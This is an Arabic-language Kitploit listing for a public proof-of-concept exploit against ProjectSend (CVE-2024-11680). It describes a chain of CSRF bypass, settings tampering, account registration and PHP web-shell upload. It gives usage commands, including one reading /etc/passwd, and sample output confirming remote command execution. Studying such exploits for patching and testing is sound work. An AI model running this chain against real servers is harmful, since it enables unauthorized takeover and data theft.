Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-11680 — يحتوي هذا المستودع على استغلال لإثبات المفهوم (PoC) لثغرة CVE-2024-11680، وهي ثغرة حرجة في ProjectSend r1605 والإصدارات الأقدم. يهدف الاستغلال إلى المصادقة غير الصحيحة الناتجة عن مشاكل في إعدادات الامتيازات غير الصحيحة وحقن الأوامر. | Kitploit
أدوات/GitHubGitHub/qucklecrabik/cve-2024-11680
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

يحتوي هذا المستودع على استغلال لإثبات المفهوم (PoC) لثغرة CVE-2024-11680، وهي ثغرة حرجة في ProjectSend r1605 والإصدارات الأقدم. يهدف الاستغلال إلى المصادقة غير الصحيحة الناتجة عن مشاكل في إعدادات الامتيازات غير الصحيحة وحقن الأوامر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد
مشاركة

استغلال ProjectSend CVE-2024-11680

هذا هو استغلال إثبات مفهوم لـ CVE-2024-11680، وهي ثغرة تسمح بتعديل الإعدادات دون مصادقة ورفع ويب شيل في ProjectSend.

الوصف

يستغل هذا الاستغلال عدة ثغرات في ProjectSend:

  • التحايل على رمز CSRF مما يسمح بتغيير الإعدادات
  • إعدادات تسجيل عملاء غير آمنة
  • رفع ملفات دون قيود يؤدي إلى تنفيذ برمجي عن بُعد

المتطلبات

  • Python 3.x
  • حزم Python المطلوبة:
    root@kitploit:~
    pip install requests colorama
    

الاستخدام

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

الوسائط

  • -u, --url: عنوان الهدف (مثل: http://target.com/projectsend)
  • -c, --command: الأمر المراد تنفيذه على الهدف (الافتراضي: id)
  • أمثلة

    root@kitploit:~
    # Get Python version
    python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
    
    # List directory contents
    python3 exploit.py -u http://target.com/projectsend -c "ls -la"
    
    # Get system information
    python3 exploit.py -u http://target.com/projectsend -c "uname -a"
    
    # Read passwd file
    python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
    

    كيف يعمل

    1. الاستطلاع: يجلب رمز CSRF ويتحقق من قابلية الهدف للاستغلال
    2. التلاعب بالإعدادات: يفعّل خيارات تسجيل العملاء غير الآمنة
    3. تسجيل المستخدم: ينشئ حساب عميل جديد مع موافقة تلقائية
    4. رفع الملفات: يرفع ويب شيل PHP بامتداد .phtml
    5. تنفيذ الأوامر: ينفذ الأوامر المحددة عبر القشرة المرفوعة

    الميزات

    • استخراج تلقائي لرمز CSRF
    • توليد عشوائي لبيانات اعتماد المستخدم
    • تسمية ذكية للملفات وكشف الطوابع الزمنية
    • مخرجات ملونة لرؤية أفضل
    • قدرة مدمجة على تنفيذ الأوامر

    إشعار قانوني

    هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.

    المراجع

    • CVE-2024-11680

    مثال على المخرجات

    root@kitploit:~
    [+] Target is vulnerable
    [+] Insecure options enabled
    [+] User registered successfully.
    [+] New username: NoDLQWYF
    [+] New password: X02A3g9LuN4S
    [+] File uploaded: kLoISqdA.phtml
    [+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
    [+] Command Output:
    Python 3.9.2
    
    تنزيل الأداة